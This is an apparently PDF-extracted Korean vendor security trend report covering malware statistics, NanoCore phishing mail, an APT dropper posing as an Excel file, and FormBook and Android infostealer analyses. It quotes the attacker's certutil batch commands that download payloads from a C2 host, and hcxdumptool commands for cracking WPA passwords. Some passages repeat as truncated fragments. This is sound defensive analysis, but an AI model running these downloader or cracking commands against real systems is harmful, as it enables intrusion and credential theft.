01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 악성코드가첨부된무역관련악성메일주의 기업거래내역엑셀문서

Size: px

Start display at page:

Download "01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 악성코드가첨부된무역관련악성메일주의 기업거래내역엑셀문서"

유준 노
5 years ago
Views:

1 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

2 01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 악성코드가첨부된무역관련악성메일주의 기업거래내역엑셀문서파일로위장한 APT 표적공격주의 03 악성코드분석보고 개요 악성코드상세분석 결론 04 해외보안동향 영미권 중국 일본

3 이스트시큐리티보안동향보고서 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 1

4 01 악성코드통계및분석 1. 악성코드동향 7 월에는 GandCrab 의새버전이확인된상황과국내에서토렌트를통해최신영화파일과함께악성코드가유포되는 것이가장큰이슈였습니다. 기존버전과다른형태로새로제작된 GandCrab 랜섬웨어의최신버전이 v4.0 으로 7 월초에업데이트된것이확인되었고, 새로운 GandCrab 은정품소프트웨어의크랙다운로드를위장하여유포되었습니다. 기존과다른암호화알고리즘을적용하고새로운형태의확장자.KRAB 을암호화된파일뒤에붙이며, 랜섬노트이름이변경되었고새로운 TOR 지불사이트를이용하는것이특징이었습니다. 또한이 GandCrab v4.0 은 7 월말까지버전업을거듭하였으며특히안랩에서이 GandCrab 랜섬웨어 v4.0 의킬스위치를공개한이후, 7월말에는 v4.3 까지업그레이드되었습니다. 이 GandCrab 의경우정품소프트웨어크랙다운로드로위장하는것외에도한글로작성된경력직입사지원서를위장하여유포가되기도하여사용자들의주의가필요합니다. 국내에서는 GandCrab 의위협외에도, 극장에서상영중이거나막상영이끝난최신영화를불법으로토렌트를사용하여 다운로드하는사용자를노린공격도 7 월부터계속적으로확인되고있습니다. 최신영화파일인것처럼확장자가 작업되어있고실제로영상파일로위장한파일을클릭하면공격자가의도한악성파일이내려오게됩니다. GandCrab 이나토렌트를통해유포되는악성코드를보면, 공격자들은주요유포경로로불법다운로드, 크랙다운로드를활용하고있습니다. 최신보안패치업데이트와더불어정품소프트웨어와정품컨텐츠를다운로드및사용하는자세는외부보안위협으로부터자신의소중한자산을안전하게보호하는중요한태도임을다시한번상기해야하겠습니다. 2

5 01 악성코드통계및분석 2. 알약악성코드탐지통계 감염악성코드 TOP 년 7 월의감염악성코드 Top 15 리스트에서는지난 2018 년 6 월에도 1위를차지했던 Trojan.Agent.gen 이이번달 Top 15 리스트에서도 1 위를차지했다. 지난 5월에 2 위였던 Misc.HackTool.AutoKMS 도이번달역시 2 위를차지했다. 전반적으로타악성코드의경우는지난달과대비하여큰차이를보이지않았으나, 1 위를차지한 Trojan.Agent.gen 의경우는지난달과비교하여 5 배가까이감염건수가증가했는데, 그이유는토렌트를통해최신영화파일에악성코드가포함되어유포되는케이스가증가하면서중복탐지건수가급증하면서통계상으로 5 배늘어난수치를보였다. 실제유포건수는지난달에비해조금상승한수준이었다. 순위 등락 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 - Trojan.Agent.gen Trojan 5,344, Misc.HackTool.AutoKMS Trojan 680, Trojan.HTML.Ramnit.A Trojan 560, Trojan.LNK.Gen Trojan 383,994 5 New Gen:Variant.Kazy Trojan 375, Win32.Neshta.A Virus 345, Adware.SearchSuite Adware 342, Misc.Riskware.BitCoinMiner Trojan 338, Misc.Keygen Trojan 333, Win32.Ramnit Worm 244, Trojan.ShadowBrokers.A Trojan 215, Worm.ACAD.Bursted.doc.B Worm 204, New Worm.Brontok-F Worm 177, Win32.Ramnit.Dam Worm 171, Exploit.CVE Gen Exploit 134,094 * 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 2018 년 7 월 01 일 ~ 2018 년 7 월 31 일 3

6 01 악성코드통계및분석 악성코드유형별비율 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 84% 를차지했으며웜 (Worm) 유형이 8% 로그뒤를 이었다. 취약점 1% 바이러스 웜 4% 트로이목마 (Trojan) 8% 스파이웨어 (Spyware) 애드웨어 3% 트로이목마 84% 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 카테고리별악성코드비율전월비교 7 월에는 6 월과비교하여트로이목마 (Trojan) 악성코드감염카테고리비율이 71% 에서 84% 로크게증가하였다. 원인은토렌트를통해악성코드가포함된영화파일이유포되었는데이를알약이중복탐지를하여수치상으로급등한것으로보인다. 다만, 이부분은배포건수나등록된악성코드건수를봤을때이전달에비해조금상승한수준이다. 100% 100% 트로이목마 (Trojan) 스파이웨어 (Spyware) 0% 0% 71% 84% 애드웨어 (Adware) 3% 6% 하이재커 (Hijacker) 0% 0% 웜 (Worm) 8% 11% 7 월 취약점 (Exploit) 1% 3% 6 월 바이러스 (Virus) 4% 6% 백도어 (Backdoor) 0% 0% 호스트파일 (Host) 0% 3% 기타 (Etc) 0% 0% 0% 20% 40% 60% 80% 100% 4

7 01 악성코드통계및분석 3. 허니팟 / 트래픽분석 7 월의상위 Top 10 포트 허니팟 / 정보수집용메일서버를통해유입된악성코드가사용하는포트정보및악성트래픽을집계한수치 % 80 4% 81 10% % % 22 15% % 21 1% 23 21% 25 31% 최근 3 개월간상위 Top 5 포트월별추이 2018 년 5 월 2018 년 6 월 2018 년 7 월

8 01 악성코드통계및분석 악성트래픽유입추이 외부로부터유입되는악의적으로보이는트래픽의접속시도가감지된수치 25,184,718 17,636,329 20,556,512 18,796,029 12,951,301 13,808, 년 2 월 2018 년 3 월 2018 년 4 월 2018 년 5 월 2018 년 6 월 2018 년 7 월 단위 : 악의적트래픽접속시도감지건수 2018 년 2 월 ~ 2018 년 7 월 6

9 이스트시큐리티보안동향보고서 02 전문가보안기고 1. 악성코드가첨부된무역관련악성메일주의 2. 기업거래내역엑셀문서파일로위장한 APT 표적공격주의 7

10 02 전문가보안기고 1. 악성코드가첨부된무역관련악성메일 주의 운송, 견적, 발주등의무역과관련된다양한내용이담긴악성메일이국내에지속적으로유포되고있어이용자들의 주의를당부드립니다. 이번에수집된메일은메일에첨부된운송관련서류의열람을유도하는내용을담고있습니다. [ 그림 1] 운송서류확인악성메일 악성메일에첨부된파일 'BL-PL-INV ace' 에는악성파일 'BL-PL-INV scr' 가있습니다. 만일이용자가무역관련문서인것처럼생각하여파일을실행할 경우, 악성코드가실행이됩니다. 8

$02 전문가보안기고 [ 그림 2] 첨부된 'BL-PL-INV-8289278827882637267277272.ace' 악성파일 악성코드가실행되면현재실행중인자기자신프로세스의경로가 '%TEMP%\subfolder\filename.$ 하지만경로가다른경우, '%TEMP%' 경로에 'subfolder' 폴더를생성하고, 폴더하위에 'filename.scr' 와 'filename.vbs' 파일을생성합니다.'filename.scr' 는자가복제된악성파일이고,'filename.

하지만경로가다른경우, '%TEMP%' 경로에 'subfolder' 폴더를생성하고, 폴더하위에 'filename.scr' 와 'filename.vbs' 파일을생성합니다.'filename.scr' 는자가복제된악성파일이고,'filename.

11 02 전문가보안기고 [ 그림 2] 첨부된 'BL-PL-INV ace' 악성파일 악성코드가실행되면현재실행중인자기자신프로세스의경로가 '%TEMP%\subfolder\filename.scr' 와동일한지 확인합니다. 동일한경우, 자기자신을자식프로세스로실행하고 'NanoCore 원격제어악성코드를로드하는악성 프로그램 ' 을인젝션합니다. 하지만경로가다른경우, '%TEMP%' 경로에 'subfolder' 폴더를생성하고, 폴더하위에 'filename.scr' 와 'filename.vbs' 파일을생성합니다.'filename.scr' 는자가복제된악성파일이고,'filename.vbs' 는자동실행레지스트리에 'Registry Key Name' 값으로자기자신 (filename.vbs) 등록및자가복제된 'filename.scr' 악성프로그램을실행하는악성스크립트파일입니다. 다음은생성된 'filename.vbs' 를실행하는코드입니다. 'filename.vbs' 가실행된뒤, 현재실행중인프로세스는종료됩니다. [ 그림 3] 'filename.vbs' 실행코드 9

12 02 전문가보안기고 'filename.vbs' 코드는다음과같습니다. [ 그림 4] 'filename.vbs' 코드 최종적으로인젝션되어실행되는자식프로세스 (filename.scr) 에서는 NanoCore 악성코드가실행되며, 키로깅기능 및 C&C( ) 연결이후원격제어기능 ( 봇기능 ) 을수행합니다. C&C 연결코드및키로깅코드는다음과 같습니다. [ 그림 5] C&C 연결코드 [ 그림 6] 키로깅코드 10

$02 전문가보안기고 키로깅된데이터들은 '%APPDATA%\[MachineGUID 값 ]\Logs\[ 사용자계정이름$ 봇기능에는키로깅한데이터를서버로전송하는기능, 감염 PC 의 DNS 캐시정보를가져오는 기능등이있습니다.

13 02 전문가보안기고 키로깅된데이터들은 '%APPDATA%\[MachineGUID 값 ]\Logs\[ 사용자계정이름 ]\KB_[ 임의의숫자 6~7 자리 ].log' 파일에저장됩니다. [ 그림 7] 키로깅데이터가저장된파일 다음은봇기능입니다. 봇기능에는키로깅한데이터를서버로전송하는기능, 감염 PC 의 DNS 캐시정보를가져오는 기능등이있습니다. 만일 C&C 와통신이이루어졌을경우, 이용자가무심결에연악성코드에의해공격자는원격으로 PC 를제어할수있어피해가발생할수있습니다. [ 그림 8] 봇코드 11

14 02 전문가보안기고 관련하여운송관련내용외에도구매주문서, 견적, 선적서류확인내용으로도유포되고있습니다. [ 그림 9] 첨부된견적서확인악성메일 [ 그림 10] 제품도면확인악성메일 12

15 02 전문가보안기고 추가적으로빨간강조색을사용하여마치진짜담당자가보낸것처럼위장한사례도있습니다. [ 그림 11] 제품도면확인악성메일사례 앞서언급한 NanoCore 악성코드가첨부된악성메일등의사례를봤을때, 무역관련내용으로위장한악성메일이꾸준히국내에유포되고있음을알수있습니다. 특히나무역관련종사자가메일에첨부된악성코드를실행할경우금전등의피해가발생할수있어주의가필요합니다. 따라서악성코드에감염이되지않기위해출처가불분명한메일에있는첨부파일혹은링크에대해접근을삼가시기바랍니다. 해당악성코드는현재알약에서 'Trojan.Agent M, Spyware.Pony, Trojan.Agent.D0600' 로진단하고있습니다. 13

02 전문가보안기고 2. 기업거래내역엑셀문서파일로위장한 APT 표적공격주의 기업거래내역서로위장한 APT 공격배경 2018 년 08 월 10 일경마치특정기업의거래내역엑셀문서처럼위장한악성코드가스피어피싱 (Spear Phishing) 기법으로유포된정황이포착되었습니다.

16 02 전문가보안기고 2. 기업거래내역엑셀문서파일로위장한 APT 표적공격주의 기업거래내역서로위장한 APT 공격배경 2018 년 08 월 10 일경마치특정기업의거래내역엑셀문서처럼위장한악성코드가스피어피싱 (Spear Phishing) 기법으로유포된정황이포착되었습니다. ESRC 는공격에활용된자료들을조사중에몇가지흥미로운단서를발견했습니다. 공격자는자신의신분을숨기기 위해마치한국의특정포털사처럼유사한정보를사용했으며, 세무회계사무소담당자로위장했습니다. 또한, 한국에서주로이용되는압축프로그램을이용했고, 엑셀 (Excel) 문서처럼보이게하기위해 2 중확장자기법을 활용했습니다. [ 그림 1] 공격벡터흐름도 14

17 02 전문가보안기고 공격절차및분석내용 공격자는특정기업의거래내역서파일처럼위장한악성파일을전송하게됩니다. 이파일은마치 MS Excel 파일처럼 보이도록, 아이콘이교묘히설정되어있으며확장명도 ' 파일명.xlsx ( 빈공간 ).exe' 형태로제작하였습니다. 이처럼파일명에다중확장자를설정할경우윈도우즈운영체제디폴트옵션 ( 알려진파일형식의파일확장명 숨기기 ) 에따라최종실행파일 (.EXE) 확장자는보이지않고, 엑셀 (.XLSX) 문서확장자만보이게됩니다. 이러한위협벡터는매우고전적인모델이지만, 누구나쉽게현혹될수있으므로, 기본적보안성강화를위해 윈도우즈 (Windows) 운영체제의폴더옵션은가급적확장명을숨기지않도록하는설정을권장합니다. [ 그림 2] 폴더옵션에서확장명보이도록설정하는화면 엑셀문서처럼위장한악성파일은한국시간 (KST) 기준으로 " :44" 제작이되었고, VMProtect 프로그램으로패킹이되어있습니다. 이파일이정상적으로작동하게되면, 해외의웹호스팅서버로접속을시도하고, '1.txt' 파일로등록되어있는배치파일 15

02 전문가보안기고 명령을수행하게됩니다. - 071790.000webhostapp.com/vic/1.txt '1.txt' 파일에는운영체제 32 비트와 64 비트로플랫폼명령을구분하였고, '1.bat' 파일로다운로드되어실행됩니다. 배치파일명령이실행되면각플랫폼에따라 'setup.txt', 'setup2.

18 02 전문가보안기고 명령을수행하게됩니다 webhostapp.com/vic/1.txt '1.txt' 파일에는운영체제 32 비트와 64 비트로플랫폼명령을구분하였고, '1.bat' 파일로다운로드되어실행됩니다. 배치파일명령이실행되면각플랫폼에따라 'setup.txt', 'setup2.txt' 파일을다운로드해, 'certutil' 명령을통해 CAB 파일로변환하게됩니다. 더불어이런추가명령과함께실행된컴퓨터에는정상적인엑셀문서를보여주어, 이용자로하여금정상적인문서로 보이도록현혹하게됩니다. [ 그림 3] 악성코드실행시함께보여지는정상적인엑셀문서화면 정상적인엑셀화면이보여지는과정에도실행된드롭퍼는계속명령제어 (C2) 서버로접속을시도하고, 만약 정상적으로통신이성공하면배치파일명령에따라 'setup.txt', 'setup2.txt' 파일을다운로드하게됩니다. 16

19 02 전문가보안기고 :if exist "%PROGRAMFILES(x86)%" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f " > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f " > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST 'certutil.exe' 프로그램은윈도우즈운영체제에기본적으로설치되어있는인증서데이터베이스도구로인증서및 데이터베이스파일을만들고수정할수있는명령줄프로그램입니다. -urlcache : URL 캐시항목을표시또는삭제 -f : 파일지정 -split : 파일저장 -decode : BASE64 파일디코딩 위명령어를통해공격자는원격지의파일다운로드및실행을수행할수있게됩니다. 또한, 배치파일구성을통해운영체제별로개별명령을내릴수도있는데, 실제공격자도이러한방식을일부적용해 사용했습니다. 또한, 유사한보안위협에서는정상적인 HWP 한글문서를다운로드해실행하는경우도존재합니다. 17

20 02 전문가보안기고 [ 그림 4] 추가악성코드설치를위한배치파일명령어화면 통신및명령이정상작동하면, 공격자가구축한서버에서 'setup.txt' 파일을다운로드해 'setup.cab' 파일로복호화하게 됩니다. 'setup.txt' 파일은내부에다음과같이서명파일 (CERTIFICATE) 처럼설정된 Base64 코드가인코딩된상태로포함되어 있습니다. 18

21 02 전문가보안기고 [ 그림 5] 서명파일로위장되어있는코드화면 복호화된 CAB 파일에는 'install.bat', 'spoolsve.exe', 'winniet.ini' 3 개의파일이포함되어있으며, 'install.bat' 파일에의해 추가적인명령이진행됩니다. 공격자는배치파일을통해다양한방식으로공격에활용하고있으며, 레지스트리 Run 값에등록해재부팅후에도 자동실행되도록만듭니다. 19

02 전문가보안기고 [ 그림 6] 다운로드되는 CAB 파일과배치파일명령어화면 'spoolsve.exe' 파일은말레이시아의특정호스트 (111.90.138.

22 02 전문가보안기고 [ 그림 6] 다운로드되는 CAB 파일과배치파일명령어화면 'spoolsve.exe' 파일은말레이시아의특정호스트 ( ) 로접속을시도해명령을대기하는데, 해당서버의 아이피주소는 'winniet.ini' 파일에인코딩되어숨겨져있습니다. [ 그림 7] 'winnet.ini' 파일에암호화되어있는 C2 아이피주소화면 20

23 02 전문가보안기고 APT 공격의현안과대응 감염된컴퓨터는조건에따라정보수집및추가명령이작동하게됩니다. 또한, 공격자의의도에따라추가악성파일이 설치될수있게됩니다. ESRC 에서는이번공격벡터가최근수개월사이한국에집중되고있다는것을확인했으며, 주로암호화페내용, 금융분야이력서등의변종이확인된바있습니다. 또한, 공격자가사용한일부전략과기술중에는정부지원해커 (State-sponsored Actor) 로추정되는흔적들이일부 오버랩되고있습니다. 이에이스트시큐리티대응센터 (ESRC) 에서는국가기반위협그룹에대한보다체계적이고지속적인인텔리전스연구와 추적을통해, 유사보안위협으로인한피해를최소화할수있도록관련모니터링을강화하고있습니다. 21

24 이스트시큐리티보안동향보고서 03 악성코드분석보고 개요 악성코드상세분석 결론 22

25 03 악성코드분석보고 [ Trojan.Agent.FormBook] 악성코드분석보고서 1. 개요 2017 년처음등장한 FormBook 악성코드가최근까지지속적으로발견되고있다. FormBook 악성코드제작자는자체적으로버전업그레이드를유지하며변종을생성하고있다. 유포방법은주로정상문서를위장하여제작되고있으며, 취약점을통하여악성코드가실행되기때문에일반사용자의경우감염사실을알기어려워주의가필요하다. 따라서, 본보고서에서는정상이메일로유포된 FormBook 악성코드의행위와이를예방하기위한방법등을 기술하고자한다. 23

업무와관련된내용으로담당자의관심을유도하고있다. [ 그림 1] 수신된이메일 하지만첨부된 60278411.

26 03 악성코드분석보고 2. 악성코드상세분석 2.1. 유포과정지난 7월특정기업에서다음과같은메일이수신되었다. 메일내용을간략하게요약하면 귀하의제품을유통과정없이직접적으로구매하고싶으니첨부된문서에작성된구매목록을확인하라 이며, 업무와관련된내용으로담당자의관심을유도하고있다. [ 그림 1] 수신된이메일 하지만첨부된 DOC 문서를열어보았을때, 메일내용에서언급한제품구매목록이아닌 hhhhhhhh 와같은의미없는문자가나열될것을확인할수있다. [ 그림 2] 첨부된 DOC 문서 24

03 악성코드분석보고 잘못작성된문서처럼보이지만이는문서취약점을이용한악성코드유포방법으로문서를여는순간사용자모르게 악성행위는시작된다. 공격자는이러한점을이용하여악성코드를유포하고감염시킨다. 2.

27 03 악성코드분석보고 잘못작성된문서처럼보이지만이는문서취약점을이용한악성코드유포방법으로문서를여는순간사용자모르게 악성행위는시작된다. 공격자는이러한점을이용하여악성코드를유포하고감염시킨다 악성코드동작흐름도 FormBook 악성코드의전체적인실행구조는다음과같다. 분석환경을확인하여악성행위동작유무를결정하고, 다계층으로인젝션을수행하는등의특징을가진다. [ 그림 3] 악성코드동작흐름도 25

03 악성코드분석보고 2.3. 60278411.DOC 분석 첨부된 60278411.

28 03 악성코드분석보고 DOC 분석 첨부된 DOC 문서내에는취약점코드가 수식 개체내부에숨겨져있다. 다음은숨겨진개체스트림 화면이다. [ 그림 4] 문서내에숨겨진개체스트림 취약점은수식개체를처리하는프로그램인 EQNEDT32.EXE 에서발생한다. 다음과같은쉘코드가동작하면 C&C 인 로부터 test.exe 파일을다운로드받고실행한다. [ 그림 5] test.exe 파일다운로드및실행코드 26

03 악성코드분석보고 2.4. test.exe 파일분석 2.4.1. 분석환경우회악성코드제작자는분석가및분석시스템으로부터분석을우회하기위하여프로세스, 파일이름, 로드된모듈, 사용자이름을확인한다. 해당항목에대한리스트들은해시값으로관리되기때문에확인이어렵다. 다음은분석환경을확인하는코드이다.

29 03 악성코드분석보고 2.4. test.exe 파일분석 분석환경우회악성코드제작자는분석가및분석시스템으로부터분석을우회하기위하여프로세스, 파일이름, 로드된모듈, 사용자이름을확인한다. 해당항목에대한리스트들은해시값으로관리되기때문에확인이어렵다. 다음은분석환경을확인하는코드이다. [ 그림 6] 분석환경체크코드 위와같은코드를통하여분석환경이확인될경우, 악성코드는종료된다 코드인젝션 또한, 백신탐지를우회하기위해프로세스인젝션을수행한다. 해당악성코드의경우직접적으로자녀프로세스를 만들어인젝션하는기존의방식과다르다. 다음은인젝션순서와코드이다. 1. explorer.exe 프로세스인젝션 2. explorer.exe 프로세스에실행되는정상프로세스를대상으로인젝션 - lsass.exe, systray.exe, netstate.exe 등 ( 정상프로세스목록은악성코드내에테이블로존재하며임의로선택된다.) 27

03 악성코드분석보고 [ 그림 7] 프로세스인젝션코드 2.5. 정상프로세스인젝션코드분석 (lsass.exe) 위과정으로인젝션된코드의주된목적은정보탈취이다. 이를위해다음과같은기능을수행한다. 2.5.1 사용자정보획득및저장가장민감한정보들을탈취하기위해레지스트리에저장되는사용자정보를확인한다.

30 03 악성코드분석보고 [ 그림 7] 프로세스인젝션코드 2.5. 정상프로세스인젝션코드분석 (lsass.exe) 위과정으로인젝션된코드의주된목적은정보탈취이다. 이를위해다음과같은기능을수행한다 사용자정보획득및저장가장민감한정보들을탈취하기위해레지스트리에저장되는사용자정보를확인한다. 탈취하는정보로는 Internet Explorer, firefox, opera, outlook, thunderbird 등이있다. 다음은 Internet Explorer 정보를탈취하는코드의일부이다. [ 그림 8] Internet Explorer 정보탈취코드 28

$[ 그림 9] OS 정보확인코드 [ 그림 10] 계정권한확인코드 획득한사용자의정보는 %APPDATA%\Roaming\[ 임의명 ]\[ 임의명.ini] 포맷의파일로저장된다. [ 그림 11] 탈취된사용자정보화면 2.5.$

31 03 악성코드분석보고 이외에도, 감염 PC 에서수집되는시스템정보로는스크린샷화면, hosts 파일정보, Username, x64/x86 버전정보, 계정권한등이있다. 다음은시스템정보획득을위한코드중일부이다. [ 그림 9] OS 정보확인코드 [ 그림 10] 계정권한확인코드 획득한사용자의정보는 %APPDATA%\Roaming\[ 임의명 ]\[ 임의명.ini] 포맷의파일로저장된다. [ 그림 11] 탈취된사용자정보화면 특정프로세스인젝션을통한사용자정보전송위에서획득한사용자정보는암호화와 Base64 인코딩을거쳐공격자의 C&C 로전송된다. 정보를전송하는행위는특정프로세스에서수행한다. 이를위해특정프로세스에인젝션을시도하고, 해당코드는프로세스별로구분하여동작한다. 29

$exe 에인젝션할경우 위과정을통해탈취된정보인 %APPDATA%\Roaming\[ 임의명 ]\[ 임의명.$ ini] 파일을 C&C 서버로전송한다. 다음은 Explorer.exe 에서사용자정보를전송하는코드이다.

32 03 악성코드분석보고 1 Explorer.exe 에인젝션할경우 위과정을통해탈취된정보인 %APPDATA%\Roaming\[ 임의명 ]\[ 임의명.ini] 파일을 C&C 서버로전송한다. 다음은 Explorer.exe 에서사용자정보를전송하는코드이다. [ 그림 12] 사용자정보전송코드 1 2 Iexplore.exe 에인젝션할경우 HttpSendRequest API 를후킹하여요청되는패킷내 pass, token, login 등의문자열을파싱하여메모리상에서사용자정보를획득한뒤 C&C 서버로전송한다. [ 그림 13] 사용자정보전송코드 2 30

33 03 악성코드분석보고 3. 결론 이메일에첨부된문서파일은취약점을통하여 C&C 로부터실질적인악성행위를하는 Formbook 악성코드인 test.exe' 를다운로드한다. 실행되는악성코드는분석환경을우회하기위해안티디버깅, 프로세스리스트, 로드된 모듈, 다계층인젝션등을이용한다. 본악성코드는사용자정보를탈취하는것을주목적으로하며레지스트리, 스크린샷, 메모리해킹등을통하여이를 수행한다. 특히 'iexplore', 'firefox', 'outlook' 등과같은브라우저와메일관련프로그램에서민감한사용자계정정보를 탈취하기때문에추가적인피해가야기될수있어각별한주의가필요하다. 따라서, 악성코드감염을방지하기위해출처가불분명한이메일의첨부파일확인을지양하며백신의최신화및 정기적인검사를습관화하여야한다. 현재알약에서는해당악성코드를 Trojan.Agent.FormBook 로진단하고있다. 31

34 03 악성코드분석보고 [Misc.Android.InfoStealer] 악성코드분석보고서 1. 개요 최근안드로이드기기의성능이발전하면서그쓰임새가다양해지고있다. 특히, 폭넓은종류의게임들이출시되면서미니게임기를대체하고있다. 이에게임을더욱더재미있고쉽게즐길수있도록도와주는관련주변기기들도다양해지고있다. 그중에서도복잡하고빠른게임의이용을돕는게임패드의활용이빠르게증가하고있다. 대부분의게임패드가중국에서수입되고있으며중국제조사의설정앱과연동을해야원활한사용이가능하다. 그런데, 문제는이설정앱에서과도한권한을요구하고사용자몰래기기정보를수집하고전송하는것이다. 본분석보고서에서는 'Misc.Android.InfoStealer' 를상세분석하고자한다. 32

35 03 악성코드분석보고 2. 악성코드상세분석 2.1. 게임패드사용 이스트게임즈의고양이다방 2 게임을플레이하는장면이며, 안드로이드기기에게임패드를착용하여게임을할수 있다. [ 그림 1] 게임패드사용 2.2 설정앱다운로드 게임패드의키매핑기능을활용하기위해서패드제조사의설정앱을다운받아야한다. 그러나설명서와다운로드 홈페이지어디에서도기기정보를수집한다는내용은볼수없다. [ 그림 2] 설명서및다운로드홈페이지 33

36 03 악성코드분석보고 2.3 과도한권한요구 아무런설명없이기기상태, 인터넷등중요한 30 개의권한을요구한다. [ 그림 3] 30 개의권한요구 2.4 기기정보수집 기기아이디, 브랜드, 제조사, 모델등과관련된정보들을수집한다. [ 그림 4] 기기정보수집 34

37 03 악성코드분석보고 2.5 망사업자정보수집 기기의망사업자와관련된정보들을수집한다. [ 그림 5] 망사업자정보수집 2.6 국가및사업자정보수집 기기의국가와사업자정보를수집한다. mcc 는 mobile country code, mnc 는 mobile network code 의약자이다. [ 그림 6] 국가및사업자코드 2.7 GSM 정보수집 기기의 GSM(Global System for Mobile Communications) 관련정보를수집한다. 35

38 03 악성코드분석보고 [ 그림 7] GSM 정보수집 2.8 위치정보수집 기기의국가, 언어, 위도, 경도를수집한다. [ 그림 8] 위치정보수집 2.9 네트워크정보수집 기기의네트워크활성화여부, 네트워크종류 ( 데이터, 와이파이등 ) 를수집한다. 36

39 03 악성코드분석보고 [ 그림 9] 네트워크정보수집 2.10 주변맥주소정보수집 기기주변의와이파이맥주소를수집한다. [ 그림 10] 맥주소수집 37

40 03 악성코드분석보고 2.11 실행정보수집 현재실행되고있는앱과사용자에게보여지는화면에서실행되고있는앱관련정보들을수집한다. [ 그림 11] 실행정보수집 2.12 설치정보수집 설치되어있는앱들의패키지명을수집한다. [ 그림 12] 설치된앱의패키지명수집 38

41 03 악성코드분석보고 2.13 cpu 정보수집 cpu 정보를수집한다. 해당파일을확인해보면 Cpu 와관련된특징들이기록되어있다. [ 그림 13] cpu 정보수집 2.14 최고관리자권환획득과쉘명령어활용최고관리자권한획득을시도한다. 최고관리자권한획득후기기를편하게조작할수있도록도와주는 busybox 를활용하여폴더생성, 권한부여, 파일복사등의명령을내린다. busybox 프로그램은해당앱내부의 assets 폴더에포함되어있다. 특히,[ 그림 15] 를보면다양한파일들이실행되는데이파일들은패드의사용과관련된설정파일들이다. 39

42 03 악성코드분석보고 [ 그림 14] 최고관리자권환획득후쉘명령어활용 40

03 악성코드분석보고 [ 그림 15] 명령어를활용한다양한파일실행 쉘명령어를통해서실행된파일중 motionelf_server 파일의경우앱을삭제하더라도계속실행되고있어서기기의 재부팅을한번해야완전하게삭제된다. 해당파일은기기내부설정을조정하는파일이다. [ 그림 16] 앱삭제후에도실행되고있는파일 2.15 네트워크를통한정보전송 (data.flydigi.

43 03 악성코드분석보고 [ 그림 15] 명령어를활용한다양한파일실행 쉘명령어를통해서실행된파일중 motionelf_server 파일의경우앱을삭제하더라도계속실행되고있어서기기의 재부팅을한번해야완전하게삭제된다. 해당파일은기기내부설정을조정하는파일이다. [ 그림 16] 앱삭제후에도실행되고있는파일 2.15 네트워크를통한정보전송 (data.flydigi.com, ) 위에서수집된정보중일부가네트워크를통해서유출된다. 기기정보를시작으로패드와상관없이사용자가현재 어떤앱을실행하는지까지실시간으로전송하고있다. 특히, 마지막그림을보면현재실행되는앱정보가전송되는사이트는 Pandora 라는문구가포함되어있다. 이는정보가주요재산인현재세상에서앱제작자측에서도민감한정보임을이미알고있음을추측할수있다. 41

44 03 악성코드분석보고 [ 그림 17] 유출되는정보 42

45 03 악성코드분석보고 3. 결론 해당앱은사용자에게어떠한고지도하지않고과도한정보를수집하며, 일부정보들은네트워크를통해서유출하고 있다. 일부기타앱에서도비슷한정보를수집하고전송하고있지만, 해당앱에서는과할정도로많은정보의수집이 있다. 사용자들에게어떠한정보가수집되고전송되는지알릴필요가있다. 현재알약 M 에서는해당앱을 'Misc.Android.InfoStealer 탐지명으로진단하고있다. 43

46 이스트시큐리티보안동향보고서 04 해외보안동향 영미권 중국 일본 44

47 04 해외보안동향 1. 영미권 WPA/WPA2 를사용하는 WiFi 의패스워드를해킹하는새로운공격발견돼 How to Hack WiFi Password Easily Using New Attack On WPA/WPA2 한보안연구원이대부분의최신라우터에서 WiFi 패스워드를쉽게얻을수있는새로운 WiFi 해킹기술을발견했다. 이새로운 WiFi 해킹기술은 PMKID(Pairwise Master Key Identifier) 기반로밍기능이활성화된 WPA/WPA2 무선 네트워크프로토콜에서동작한다. WPA/WPA2 가활성화된 WiFi 네트워크를해킹하는방법은, 연구원이새로운 WPA3 보안을분석중우연히발견 되었다. 공격자들은이새로운 WiFi 해킹방식을통해 PSK( 사전공유키 ) 로그인패스워드를복구해 WiFi 네트워크를 해킹하고인터넷통신을도청할수있다. PMKID 를이용해 WiFi 패스워드를해킹하는방법 이미지출처 : 연구원에따르면, 이전에알려진 WiFI 해킹방식들은공격자들이누군가네트워크로로그인하기까지기다렸다가 네트워크포트인증프로토콜인 EAPOL 의완전한 4 방향인증핸드셰이크를캡쳐해야했다. 45

48 04 해외보안동향 반면, 새로운공격은크리덴셜캡쳐를위해다른사용자가타겟네트워크에있어야할필요가없다. 대신, 이는액세스 포인트로부터요청한후단일 EAPOL (Extensible Authentication Protocol over LAN) 프레임을사용해 RSN IE (Robust Security Network Information Element) 에서실행된다. RSN 은 무선네트워크를통한보안통신을설정하기위한프로토콜이며, 클라이언트와액세스포인트사이의 연결을설정하는데필요한키인 PMKID 를가지고있다. 1 단계 공격자는 hcxdumptool(v4.2.0 또는이후버전 ) 과같은툴을사용해타겟액세스포인트에서 PMKID 를요청하고수신한프레임을파일에덤핑한다. $./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status 2 단계 프레임의아웃풋 (pcapng 포맷 ) 은 hcxpcaptool 툴을사용해 Hashcat 에서허용되는해시포맷으로변환할수있다. $./hcxpcaptool -z test test.pcapng 3 단계 Hashcat (v 또는이후버전 ) 패스워드크래킹툴을이용해 WPA PSK(Pre-Shared Key) 